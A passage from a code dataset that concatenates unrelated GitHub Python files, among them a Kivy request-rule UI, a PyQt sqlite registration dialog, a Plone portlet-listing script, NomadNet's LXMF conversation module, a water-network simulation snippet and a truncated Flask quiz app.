None\n\n def on_release(self):\n if self.remove:\n try:\n self.remove(self)\n finally:\n pass\n\n def on_filter(self, _, _filter: data.RequestFilter):\n self.ids.filter_by.text = _filter.filter_by\n self.ids.key.text = _filter.key\n self.ids.value.text = _filter.value\n\n @property\n def data(self) -> data.RequestFilter:\n return data.RequestFilter(\n filter_by=self.ids.filter_by.text,\n key=self.ids.key.text,\n value=self.ids.value.text)\n\n\nclass OneUIBrowserResponseHeaderPanel(OneUITopBar):\n\n def remove(self):\n pass\n\n def toggle(self):\n pass\n\n\nclass OneUIBrowserRuleDataLink(OneUIBox):\n link = StringProperty()\n\n def on_link(self, _, val: str):\n self.ids.link.text = val\n\n @property\n def data(self) -> data.MockData:\n return data.MockData(link=self.ids.link.text)\n\n\nclass OneUIBrowserRuleData(OneUIBox):\n mock_data = ObjectProperty(data.MockData())\n\n def __init__(self, **kwargs):\n super(OneUIBrowserRuleData, self).__init__(**kwargs)\n self.adaptive_height = True\n\n def on_mock_data(self, _, mock_data: data.MockData):\n self.ids.content.text = mock_data.content\n self.ids.link.text = mock_data.link\n 
self.ids.status.text = mock_data.status\n self.ids.content_type.text = mock_data.content_type\n self.ids.cloud_store_permission = True if mock_data.cloud_store_permission == \"a\" else False\n for header in mock_data.headers:\n self.add_header(header=header)\n\n def add_header(self, header: data.DataHeader = data.DataHeader()) -> None:\n _widget = OneUIBrowserRuleDataHeader()\n _widget.header = header\n _widget.remove = lambda x: self.remove(x)\n if self.ids:\n self.ids.browser_rule_mock_headers.add_widget(_widget)\n\n def remove(self, child):\n self.ids.browser_rule_mock_headers.remove_widget(child)\n\n @property\n def data(self) -> data.MockData:\n return data.MockData(\n content=self.ids.content.text,\n link=self.ids.link.text,\n status=self.ids.status.text,\n content_type=self.ids.content_type.text,\n headers=[_header.data for _header in self.ids.browser_rule_mock_headers.children],\n cloud_store_permission=\"a\" if self.ids.cloud_store_permission.active else \"na\")\n\n\nclass OneUIBrowserRuleDataHeader(OneUIBox):\n header = ObjectProperty()\n\n def remove(self, x):\n pass\n\n def on_header(self, _, header: data.DataHeader):\n self.ids.key.text = header.key\n self.ids.value.text = header.value\n\n @property\n def data(self) -> data.DataHeader:\n return data.DataHeader(key=self.ids.key.text, value=self.ids.value.text)\n","repo_name":"swavan/server-oneui","sub_path":"features/browser_rule/add/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13839290113","text":"import sqlite3\nfrom utils import display\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import uic\n\n# Classe permettant d'afficher la fenêtre de visualisation des données\n\n\nclass AppFctDev1Partie3(QDialog):\n\n # Constructeur\n def __init__(self, data: sqlite3.Connection):\n super(QDialog, self).__init__()\n self.ui = uic.loadUi(\"gui/fct_dev_1_3.ui\", self)\n self.data = data\n self.ui.cbE.currentTextChanged.connect(self.on_combobox_changed)\n self.ui.cbES.currentTextChanged.connect(self.on_combobox_changed2)\n self.ui.cbM.currentTextChanged.connect(self.on_combobox_changed3)\n self.ui.bvalider.clicked.connect(self.valider)\n self.ui.bsupprimer.clicked.connect(self.supprimer)\n self.ui.bconfirmer.clicked.connect(self.confirmer)\n self.setData()\n\n # On met à jour l'affichage avec les données actuellement présentes dans la base\n self.refreshResult()\n\n def confirmer(self):\n if self.ui.cbM.currentText() == \"\":\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Merci de sélectionner 1 sportif\")\n else:\n try:\n p = int(self.ui.cbM.currentText().split('[')[1].split(']')[0])\n cursor = self.data.cursor()\n cursor.execute(\"UPDATE LesSportifs SET prenomSp = ?, nomSp = ? WHERE numSp = ?\",(self.ui.Eprenom.text(),self.ui.Enom.text(),p))\n self.data.commit()\n self.refreshResult()\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Impossible de update dans LesSportifs' : \" + repr(e))\n def supprimer(self):\n if self.ui.cbES.currentText() == \"\" or self.ui.cbIS.currentText() == \"\":\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Merci de sélectionner 1 participant et 1 épreuve\")\n else:\n try:\n p = int(self.ui.cbIS.currentText())\n ep = int(self.ui.cbES.currentText().split('[')[1].split(']')[0])\n cursor = self.data.cursor()\n cursor.execute(\"DELETE FROM LesInscriptions WHERE numIn = ? 
and numEp = ?\",(p,ep))\n self.data.commit()\n self.refreshResult()\n\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Impossible de supprimer dans LesParticipants' : \" + repr(e))\n def valider(self):\n if self.ui.cbE.currentText() == \"\" or self.ui.cbI.currentText() == \"\":\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Merci de sélectionner 1 participant et 1 épreuve\")\n else:\n try:\n p = int(self.ui.cbI.currentText())\n ep = int(self.ui.cbE.currentText().split('[')[1].split(']')[0])\n cursor = self.data.cursor()\n cursor.execute(\"INSERT INTO LesInscriptions VALUES (?,?)\",(p,ep))\n self.data.commit()\n self.refreshResult()\n\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Impossible d'insert dans LesParticipants' : \" + repr(e))\n def on_combobox_changed(self, value):\n n = int(value.split('[')[1].split(']')[0])\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"WITH Equipes AS(\"\n \" SELECT numEq as num FROM LesEquipes\"\n \" EXCEPT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Sportifs AS(\"\n \" SELECT numSp as num FROM LesSportifs\"\n \" EXCEPT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Total AS (\"\n \" SELECT num FROM Equipes\"\n \" UNION\"\n \" SELECT num FROM Sportifs\"\n \")SELECT * FROM Total\", (n,n))\n display.refreshGenericCombo(self.ui.cbI, result)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Impossible de récuperer les Participants : \" + repr(e))\n\n def on_combobox_changed2(self, value):\n n = int(value.split('[')[1].split(']')[0])\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"WITH Equipes AS(\"\n \" SELECT numEq as num FROM LesEquipes\"\n \" INTERSECT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Sportifs AS(\"\n \" SELECT numSp as num FROM LesSportifs\"\n \" INTERSECT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Total AS (\"\n \" SELECT num FROM Equipes\"\n \" UNION\"\n \" SELECT num FROM Sportifs\"\n \")SELECT * FROM Total\", (n,n))\n display.refreshGenericCombo(self.ui.cbIS, result)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Impossible de récuperer les Participants : \" + repr(e))\n\n def on_combobox_changed3(self, value):\n n = int(value.split('[')[1].split(']')[0])\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\"SELECT numSp, pays, nomSp, prenomSp FROM LesSportifs WHERE numSp = ? 
or numSp = ?\",(n,n))\n\n for row in result:\n self.ui.Enum.setText(str(row[0]))\n self.ui.Epays.setText(str(row[1]))\n self.ui.Enom.setText(str(row[2]))\n self.ui.Eprenom.setText(str(row[3]))\n\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Impossible de récuperer les Participants : \" + repr(e))\n\n def setData(self):\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"SELECT '['||numEp||']'||nomEp||' ('||formeEp||' '||categorieEp||')' FROM LesEpreuves\")\n display.refreshGenericCombo(self.ui.cbE, result)\n r2 = cursor.execute(\n \"SELECT '['||numEp||']'||nomEp||' ('||formeEp||' '||categorieEp||')' FROM LesEpreuves\")\n display.refreshGenericCombo(self.ui.cbES, r2)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Impossible de récuperer les epreuves : \" + repr(e))\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Impossible de récuperer les epreuves : \" + repr(e))\n\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"SELECT '['||numSp||']'||nomSp||' '||prenomSp FROM LesSportifs\")\n display.refreshGenericCombo(self.ui.cbM, result)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Impossible de récuperer les sportifs : \" + repr(e))\n ####################################################################################################################\n # Méthodes permettant de rafraichir les différentes tables\n ####################################################################################################################\n\n # Fonction de mise à jour de l'affichage d'une seule table\n @pyqtSlot()\n def refreshResult(self):\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\"SELECT numEp, numIn FROM LesInscriptions ORDER BY numEp, numIn\")\n display.refreshGenericData(self.ui.table_fct_dev, result)\n r2 = cursor.execute(\"SELECT numEp, numIn FROM LesInscriptions ORDER BY numEp, numIn\")\n display.refreshGenericData(self.ui.table_fct_dev_S, r2)\n except Exception as e:\n self.ui.table_fct_dev.setRowCount(0)\n self.ui.table_fct_dev_S.setRowCount(0)\n\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\"SELECT numSp, nomSp, prenomSp, pays, categorieSp, dateNaisSP FROM LesSportifs\")\n display.refreshGenericData(self.ui.table_fct_dev_M, result)\n except Exception as e:\n self.ui.table_fct_dev_M.setRowCount(0)","repo_name":"c-guill/Projet-CEBD","sub_path":"actions/v1_action_fct_dev_1_partie_3.py","file_name":"v1_action_fct_dev_1_partie_3.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42896140118","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis script list portlet assigments on a site.\n\nRun the script using the following command line:\n\n.. 
code-block:: console\n\n $ bin/instance -O Plone run scripts/list_portlets.py\n\nThe -O parameter is used to specify the id of your Plone site.\n\n\"\"\"\nfrom __future__ import print_function\nfrom plone import api\nfrom plone.portlets.interfaces import ILocalPortletAssignable\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\nfrom plone.portlets.interfaces import IPortletManager\nfrom zope.component import getMultiAdapter\nfrom zope.component import getUtility\n\n\ndef get_valid_objects():\n \"\"\"Generate a list of objects associated with valid brains.\"\"\"\n catalog = api.portal.get_tool('portal_catalog')\n results = catalog()\n print('Found {0} objects in the catalog'.format(len(results)))\n for b in api.content.find():\n try:\n obj = b.getObject()\n except (AttributeError, KeyError):\n obj = None\n\n if obj is None: # warn on broken entries in the catalog\n msg = 'Invalid object reference in the catalog: {0}'\n print(msg.format(b.getPath()))\n continue\n\n yield obj\n\n\ndef list_portlet_assignments(obj):\n \"\"\"List all portlet assignments on a given object.\"\"\"\n if not ILocalPortletAssignable.providedBy(obj):\n return\n\n print('object: {0}'.format(obj))\n for name in ('plone.leftcolumn', 'plone.rightcolumn'):\n manager = getUtility(IPortletManager, name=name)\n mapping = getMultiAdapter((obj, manager), IPortletAssignmentMapping)\n items = list(mapping.items())\n if not items:\n continue\n\n print('├─ {0}'.format(name))\n for k, v in items:\n print('├─── {0} ({1})'.format(k, v))\n\n\n# list portlets assigned to catalogued objects\nfor obj in get_valid_objects():\n list_portlet_assignments(obj)\n\n# list portlets assigned to portal root\nlist_portlet_assignments(api.portal.get())\n","repo_name":"plonegovbr/portal.buildout","sub_path":"scripts/list_portlets.py","file_name":"list_portlets.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"23806759521","text":"import requests\r\nimport base64\r\n\r\nwith open('input/images.jpeg', 'rb') as f:\r\n imagem_bytes = f.read()\r\n\r\nimagem_base64 = base64.b64encode(imagem_bytes).decode('utf-8')\r\n\r\npayload = {\r\n 'body': imagem_base64\r\n}\r\n\r\nurl = 'https://yhdf1b8upg.execute-api.us-east-1.amazonaws.com/pikomonstage'\r\nresponse = requests.post(url, json=payload)\r\n\r\nprint(\"Status Code:\", response.status_code)\r\n\r\nif response.text == '[]':\r\n print(\"Pokemon não reconhecido\")\r\nelse:\r\n print(\"Pokemon:\", response.text.replace('[\"', \"\").replace('\"]', \"\"))","repo_name":"lucaslima433/PISI4-Pokedex","sub_path":"RST.py","file_name":"RST.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5042349896","text":"import os\nimport RNS\nimport LXMF\nimport shutil\nimport nomadnet\nfrom nomadnet.Directory import DirectoryEntry\n\nclass Conversation:\n cached_conversations = {}\n unread_conversations = {}\n created_callback = None\n\n aspect_filter = \"lxmf.delivery\"\n @staticmethod\n def received_announce(destination_hash, announced_identity, app_data):\n app = nomadnet.NomadNetworkApp.get_shared_instance()\n\n if not destination_hash in app.ignored_list:\n destination_hash_text = RNS.hexrep(destination_hash, delimit=False)\n # Check if the announced destination is in\n # our list of conversations\n if destination_hash_text in [e[0] for e in Conversation.conversation_list(app)]:\n if 
app.directory.find(destination_hash):\n if Conversation.created_callback != None:\n Conversation.created_callback()\n else:\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n # Add the announce to the directory announce\n # stream logger\n app.directory.lxmf_announce_received(destination_hash, app_data)\n \n else:\n RNS.log(\"Ignored announce from \"+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)\n\n @staticmethod\n def query_for_peer(source_hash):\n try:\n RNS.Transport.request_path(bytes.fromhex(source_hash))\n except Exception as e:\n RNS.log(\"Error while querying network for peer identity. The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n @staticmethod\n def ingest(lxmessage, app, originator = False, delegate = None):\n if originator:\n source_hash = lxmessage.destination_hash\n else:\n source_hash = lxmessage.source_hash\n \n source_hash_path = RNS.hexrep(source_hash, delimit=False)\n\n conversation_path = app.conversationpath + \"/\" + source_hash_path\n\n if not os.path.isdir(conversation_path):\n os.makedirs(conversation_path)\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n ingested_path = lxmessage.write_to_directory(conversation_path)\n\n if RNS.hexrep(source_hash, delimit=False) in Conversation.cached_conversations:\n conversation = Conversation.cached_conversations[RNS.hexrep(source_hash, delimit=False)]\n conversation.scan_storage()\n\n if not source_hash in Conversation.unread_conversations:\n Conversation.unread_conversations[source_hash] = True\n try:\n dirname = RNS.hexrep(source_hash, delimit=False)\n open(app.conversationpath + \"/\" + dirname + \"/unread\", 'a').close()\n except Exception as e:\n pass\n\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n return ingested_path\n\n @staticmethod\n def conversation_list(app):\n conversations = []\n for dirname in os.listdir(app.conversationpath):\n if len(dirname) == RNS.Identity.TRUNCATED_HASHLENGTH//8*2 and os.path.isdir(app.conversationpath + \"/\" + dirname):\n try:\n source_hash_text = dirname\n source_hash = bytes.fromhex(dirname)\n app_data = RNS.Identity.recall_app_data(source_hash)\n display_name = app.directory.display_name(source_hash)\n\n unread = False\n if source_hash in Conversation.unread_conversations:\n unread = True\n elif os.path.isfile(app.conversationpath + \"/\" + dirname + \"/unread\"):\n Conversation.unread_conversations[source_hash] = True\n unread = True\n\n if display_name == None and app_data:\n display_name = app_data.decode(\"utf-8\")\n\n if display_name == None:\n sort_name = \"\"\n else:\n sort_name = display_name\n \n trust_level = app.directory.trust_level(source_hash, display_name)\n \n entry = (source_hash_text, display_name, trust_level, sort_name, unread)\n conversations.append(entry)\n\n except Exception as e:\n RNS.log(\"Error while loading conversation \"+str(dirname)+\", skipping it. 
The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n conversations.sort(key=lambda e: (-e[2], e[3], e[0]), reverse=False)\n\n return conversations\n\n @staticmethod\n def cache_conversation(conversation):\n Conversation.cached_conversations[conversation.source_hash] = conversation\n\n @staticmethod\n def delete_conversation(source_hash_path, app):\n conversation_path = app.conversationpath + \"/\" + source_hash_path\n\n try:\n if os.path.isdir(conversation_path):\n shutil.rmtree(conversation_path)\n except Exception as e:\n RNS.log(\"Could not remove conversation at \"+str(conversation_path)+\". The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n def __init__(self, source_hash, app, initiator=False):\n self.app = app\n self.source_hash = source_hash\n self.send_destination = None\n self.messages = []\n self.messages_path = app.conversationpath + \"/\" + source_hash\n self.messages_load_time = None\n self.source_known = False\n self.source_trusted = False\n self.source_blocked = False\n self.unread = False\n\n self.__changed_callback = None\n\n if not RNS.Identity.recall(bytes.fromhex(self.source_hash)):\n RNS.Transport.request_path(bytes.fromhex(source_hash))\n\n self.source_identity = RNS.Identity.recall(bytes.fromhex(self.source_hash))\n\n if self.source_identity:\n self.source_known = True\n self.send_destination = RNS.Destination(self.source_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, \"lxmf\", \"delivery\")\n\n if initiator:\n if not os.path.isdir(self.messages_path):\n os.makedirs(self.messages_path)\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n self.scan_storage()\n\n self.trust_level = app.directory.trust_level(bytes.fromhex(self.source_hash))\n\n Conversation.cache_conversation(self)\n\n def scan_storage(self):\n old_len = len(self.messages)\n self.messages = []\n for filename in os.listdir(self.messages_path):\n if len(filename) == RNS.Identity.HASHLENGTH//8*2:\n message_path = self.messages_path + \"/\" + filename\n self.messages.append(ConversationMessage(message_path))\n\n new_len = len(self.messages)\n\n if new_len > old_len:\n self.unread = True\n\n if self.__changed_callback != None:\n self.__changed_callback(self)\n\n def purge_failed(self):\n purged_messages = []\n for conversation_message in self.messages:\n if conversation_message.get_state() == LXMF.LXMessage.FAILED:\n purged_messages.append(conversation_message)\n conversation_message.purge()\n\n for purged_message in purged_messages:\n self.messages.remove(purged_message)\n\n def clear_history(self):\n purged_messages = []\n for conversation_message in self.messages:\n purged_messages.append(conversation_message)\n conversation_message.purge()\n\n for purged_message in purged_messages:\n self.messages.remove(purged_message)\n\n def register_changed_callback(self, callback):\n self.__changed_callback = callback\n\n def send(self, content=\"\", title=\"\"):\n if self.send_destination:\n dest = self.send_destination\n source = self.app.lxmf_destination\n desired_method = LXMF.LXMessage.DIRECT\n if self.app.directory.preferred_delivery(dest.hash) == DirectoryEntry.PROPAGATED:\n if self.app.message_router.get_outbound_propagation_node() != None:\n desired_method = LXMF.LXMessage.PROPAGATED\n\n lxm = LXMF.LXMessage(dest, source, content, title=title, desired_method=desired_method)\n lxm.register_delivery_callback(self.message_notification)\n lxm.register_failed_callback(self.message_notification)\n\n if self.app.message_router.get_outbound_propagation_node() != 
None:\n lxm.try_propagation_on_fail = self.app.try_propagation_on_fail\n\n self.app.message_router.handle_outbound(lxm)\n\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n\n return True\n else:\n RNS.log(\"Destination is not known, cannot create LXMF Message.\", RNS.LOG_VERBOSE)\n return False\n\n def paper_output(self, content=\"\", title=\"\", mode=\"print_qr\"):\n if self.send_destination:\n try:\n dest = self.send_destination\n source = self.app.lxmf_destination\n desired_method = LXMF.LXMessage.PAPER\n\n lxm = LXMF.LXMessage(dest, source, content, title=title, desired_method=desired_method)\n\n if mode == \"print_qr\":\n qr_code = lxm.as_qr()\n qr_tmp_path = self.app.tmpfilespath+\"/\"+str(RNS.hexrep(lxm.hash, delimit=False))\n qr_code.save(qr_tmp_path)\n\n print_result = self.app.print_file(qr_tmp_path)\n os.unlink(qr_tmp_path)\n \n if print_result:\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n\n return print_result\n\n elif mode == \"save_qr\":\n qr_code = lxm.as_qr()\n qr_save_path = self.app.downloads_path+\"/LXM_\"+str(RNS.hexrep(lxm.hash, delimit=False)+\".png\")\n qr_code.save(qr_save_path)\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n return qr_save_path\n\n elif mode == \"save_uri\":\n lxm_uri = lxm.as_uri()+\"\\n\"\n uri_save_path = self.app.downloads_path+\"/LXM_\"+str(RNS.hexrep(lxm.hash, delimit=False)+\".txt\")\n with open(uri_save_path, \"wb\") as f:\n f.write(lxm_uri.encode(\"utf-8\"))\n\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n return uri_save_path\n\n elif mode == \"return_uri\":\n return lxm.as_uri()\n\n except Exception as e:\n RNS.log(\"An error occurred while generating paper message, the contained exception was: \"+str(e), RNS.LOG_ERROR)\n return False\n\n else:\n RNS.log(\"Destination is not known, cannot create LXMF Message.\", RNS.LOG_VERBOSE)\n return False\n\n def message_notification(self, message):\n if message.state == LXMF.LXMessage.FAILED and hasattr(message, \"try_propagation_on_fail\") and message.try_propagation_on_fail:\n RNS.log(\"Direct delivery of \"+str(message)+\" failed. 
Retrying as propagated message.\", RNS.LOG_VERBOSE)\n message.try_propagation_on_fail = None\n message.delivery_attempts = 0\n del message.next_delivery_attempt\n message.packed = None\n message.desired_method = LXMF.LXMessage.PROPAGATED\n self.app.message_router.handle_outbound(message)\n else:\n message_path = Conversation.ingest(message, self.app, originator=True)\n\n def __str__(self):\n string = self.source_hash\n\n # TODO: Remove this\n # if self.source_identity:\n # if self.source_identity.app_data:\n # # TODO: Sanitise for viewing, or just clean this\n # string += \" | \"+self.source_identity.app_data.decode(\"utf-8\")\n\n return string\n\n\n\nclass ConversationMessage:\n def __init__(self, file_path):\n self.file_path = file_path\n self.loaded = False\n self.timestamp = None\n self.lxm = None\n\n def load(self):\n try:\n self.lxm = LXMF.LXMessage.unpack_from_file(open(self.file_path, \"rb\"))\n self.loaded = True\n self.timestamp = self.lxm.timestamp\n self.sort_timestamp = os.path.getmtime(self.file_path)\n\n if self.lxm.state > LXMF.LXMessage.DRAFT and self.lxm.state < LXMF.LXMessage.SENT:\n found = False\n for pending in nomadnet.NomadNetworkApp.get_shared_instance().message_router.pending_outbound:\n if pending.hash == self.lxm.hash:\n found = True\n\n if not found:\n self.lxm.state = LXMF.LXMessage.FAILED\n\n except Exception as e:\n RNS.log(\"Error while loading LXMF message \"+str(self.file_path)+\" from disk. The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n def unload(self):\n self.loaded = False\n self.lxm = None\n\n def purge(self):\n self.unload()\n if os.path.isfile(self.file_path):\n os.unlink(self.file_path)\n\n def get_timestamp(self):\n if not self.loaded:\n self.load()\n\n return self.timestamp\n\n def get_title(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.title_as_string()\n\n def get_content(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.content_as_string()\n\n def get_hash(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.hash\n\n def get_state(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.state\n\n def get_transport_encryption(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.transport_encryption\n\n def get_transport_encrypted(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.transport_encrypted\n\n def signature_validated(self):\n if not self.loaded:\n self.load()\n\n return self.lxm.signature_validated\n\n def get_signature_description(self):\n if self.signature_validated():\n return \"Signature Verified\"\n else:\n if self.lxm.unverified_reason == LXMF.LXMessage.SOURCE_UNKNOWN:\n return \"Unknown Origin\"\n elif self.lxm.unverified_reason == LXMF.LXMessage.SIGNATURE_INVALID:\n return \"Invalid Signature\"\n else:\n return \"Unknown signature validation failure\"","repo_name":"markqvist/NomadNet","sub_path":"nomadnet/Conversation.py","file_name":"Conversation.py","file_ext":"py","file_size_in_byte":15306,"program_lang":"python","lang":"en","doc_type":"code","stars":337,"dataset":"github-code","pt":"53"} +{"seq_id":"18561660434","text":"from datetime import datetime\nfrom typing import Dict, List, Union\n\nfrom rootski.schemas import breakdown as schemas\nfrom rootski.services.database.dynamo.models.breakdown import Breakdown\nfrom rootski.services.database.dynamo.models.breakdown_item import BreakdownItem, NullBreakdownItem\nfrom rootski.services.database.dynamo.models.morpheme import Morpheme\n\n\ndef pydantic_to_dynamo__breakdown(\n user_breakdown: 
schemas.BreakdownUpsert,\n morpheme_data: Dict[str, Morpheme],\n user_email: str,\n word: str,\n is_admin: bool,\n) -> Breakdown:\n\n breakdown_items: List[Union[NullBreakdownItem, BreakdownItem]] = [\n pydantic_to_dynamo__breakdown_item(\n breakdown_item=breakdown_item,\n morpheme_data_objs=morpheme_data,\n user_email=user_email,\n word_id=user_breakdown.word_id,\n )\n for breakdown_item in user_breakdown.breakdown_items\n ]\n\n if is_admin:\n return Breakdown(\n word=word,\n word_id=user_breakdown.word_id,\n is_verified=True,\n is_inference=False,\n submitted_by_user_email=user_email,\n date_submitted=datetime.now(),\n date_verified=datetime.now(),\n breakdown_items=breakdown_items,\n )\n\n return Breakdown(\n word=word,\n word_id=user_breakdown.word_id,\n is_verified=False,\n is_inference=False,\n submitted_by_user_email=user_email,\n date_submitted=datetime.now(),\n date_verified=None,\n breakdown_items=breakdown_items,\n )\n\n\ndef pydantic_to_dynamo__breakdown_item(\n breakdown_item: Union[schemas.NullMorphemeBreakdownItem, schemas.MorphemeBreakdownItemInRequest],\n morpheme_data_objs: Dict[str, Morpheme],\n user_email: str,\n word_id: str,\n) -> Union[NullBreakdownItem, BreakdownItem]:\n DEPRECATED_BREAKDOWN_ID = -1\n\n if breakdown_item.morpheme_id is None:\n return NullBreakdownItem(\n word_id=word_id,\n position=breakdown_item.position,\n morpheme=breakdown_item.morpheme,\n submitted_by_user_email=user_email,\n )\n\n return BreakdownItem(\n word_id=word_id,\n position=breakdown_item.position,\n morpheme=morpheme_data_objs[str(breakdown_item.morpheme_id)].morpheme,\n morpheme_id=breakdown_item.morpheme_id,\n morpheme_family_id=morpheme_data_objs[str(breakdown_item.morpheme_id)].family_id,\n submitted_by_user_email=user_email,\n breakdown_id=DEPRECATED_BREAKDOWN_ID,\n )\n","repo_name":"rootski-io/rootski","sub_path":"rootski_api/src/rootski/services/database/dynamo/models2schemas/breakdown_schema_to_model.py","file_name":"breakdown_schema_to_model.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"9730193959","text":"# IMPORT PYTHON LIBRARY\nimport wntr \n\n# IMPORT EPANET WATER DISTRIBUTION NETWORKS (WDN)\ninp_file = 'G:/My Drive/Work Data/PT. Hutomo Bangun Perkasa/Hydroinformatics/Urban Modelling/WNTR/Net1.inp'\nwn = wntr.network.WaterNetworkModel(inp_file)\n\n# SIMULATE HYDRAULIC MODEL OF WDN\nsim = wntr.sim.EpanetSimulator(wn)\nresults = sim.run_sim() \n\n# GRAPH WATER DISTRIBUTION NETWORKS (WDN)\nwntr.graphics.plot_network(wn, title = 'Water Distribution Networks') \n\n# CASE: MINIMUM PRESSURE ALONG THE NETWORK IS 20 FEET. WE NEED TO CHANGE THE DIAMETER OF PIPE 10. 
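The rootski converter above selects between a null-object record and a full record by checking whether morpheme_id is present. A minimal, self-contained sketch of that same dispatch follows; the dataclasses are hypothetical stand-ins, not rootski's real pydantic or Dynamo classes.

from dataclasses import dataclass
from typing import Optional, Union

@dataclass
class NullItem:  # hypothetical stand-in for NullBreakdownItem
    position: int
    morpheme: str

@dataclass
class FullItem:  # hypothetical stand-in for BreakdownItem
    position: int
    morpheme: str
    morpheme_id: int

def to_item(position: int, morpheme: str,
            morpheme_id: Optional[int]) -> Union[NullItem, FullItem]:
    # Mirror the "if breakdown_item.morpheme_id is None" branch above:
    # a missing id maps to the null-object variant.
    if morpheme_id is None:
        return NullItem(position=position, morpheme=morpheme)
    return FullItem(position=position, morpheme=morpheme, morpheme_id=morpheme_id)

print(to_item(0, "при", None))  # NullItem(position=0, morpheme='при')
print(to_item(1, "каз", 42))    # FullItem(position=1, morpheme='каз', morpheme_id=42)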
\n\n# CHECK PRESSURE ALONG THE NETWORK\nP_Nodes = results.node['pressure']\nprint(P_Nodes)","repo_name":"axlhtm/Hydroinformatics","sub_path":"Urban Modelling/WNTR/Network 1 - Study Case.py","file_name":"Network 1 - Study Case.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42053987155","text":"from flask import (\n    Response,\n    render_template,\n    Blueprint,\n    flash,\n    redirect,\n    url_for,\n    request,\n    abort,\n)\nfrom flask_login import current_user, login_required\nfrom project.models import Questions, QuestionsAnswered, Mock\nfrom project import db\n\n\nmain = Blueprint(\"main\", __name__)\n\n\n@main.route(\"/\")\n@main.route(\"/home\")\ndef home():\n    return render_template(\"main/home.html\", title=\"Home\")\n\n\n@main.route(\"/about\")\ndef about():\n    return render_template(\"main/about.html\", title=\"About\")\n\n\n@main.route(\"/topics\")\n@login_required\ndef topics():\n    sections = [\n        x[0] for x in Questions.query.with_entities(Questions.Section).distinct().all()\n    ]\n    topics = {}\n    for section in sections:\n        topics[section] = [\n            x[0]\n            for x in Questions.query.with_entities(Questions.Topic)\n            .filter_by(Section=section)\n            .distinct()\n            .all()\n        ]\n    return render_template(\"main/topics.html\", title=\"Topics\", topics=topics)\n\n\n@main.route(\"/questions/<section>/<topic>\")\n@login_required\ndef questions(section, topic):\n    s, t = section.replace(\"_\", \" \"), topic.replace(\"_\", \" \")\n    questions = Questions.query.filter_by(Section=s, Topic=t).all()\n    answers = QuestionsAnswered.query.filter_by(UID=current_user.id).all()\n    answers = {x.QID: (x.Option, x.Status) for x in answers}\n    return render_template(\n        \"main/questions.html\",\n        title=t,\n        questions=questions,\n        count=1,\n        len=len(questions),\n        answers=answers,\n    )\n\n\n@main.route(\"/save/<qid>/<status>/<selection>\")\n@login_required\ndef save(qid, status, selection):\n    uid = current_user.id\n\n    data = QuestionsAnswered.query.filter_by(QID=qid, UID=uid).first()\n    if data != None:\n        data.Status = status\n        data.Option = selection\n    else:\n        data = QuestionsAnswered(\n            